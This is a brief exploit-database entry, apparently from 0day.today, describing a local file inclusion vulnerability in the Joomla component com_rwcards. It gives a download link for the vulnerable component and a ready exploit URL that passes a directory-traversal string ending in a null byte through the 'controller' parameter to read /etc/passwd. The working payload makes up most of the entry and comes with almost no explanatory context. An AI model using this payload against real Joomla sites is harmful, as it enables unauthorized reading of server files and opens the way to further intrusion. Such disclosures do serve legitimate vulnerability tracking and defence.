id: 10937
date: 02/16/2010
title: Joomla Component com_rwcards LFI Vulnerability
author: ByEge
cves: 

==============================================
Joomla Component com_rwcards LFI Vulnerability
==============================================

Joomla Component com_rwcards LFI Vulnerability

Scrip : Joomla

Download link : http://www.weberr.de/index.php/downloads-mainmenu-27/doc_download/56-rwcards-3018.html

exploit : http://localhost/index.php?option=com_rwcards&controller=../../../../../../etc/passwd%00




#  0day.today [2023-03-26]  #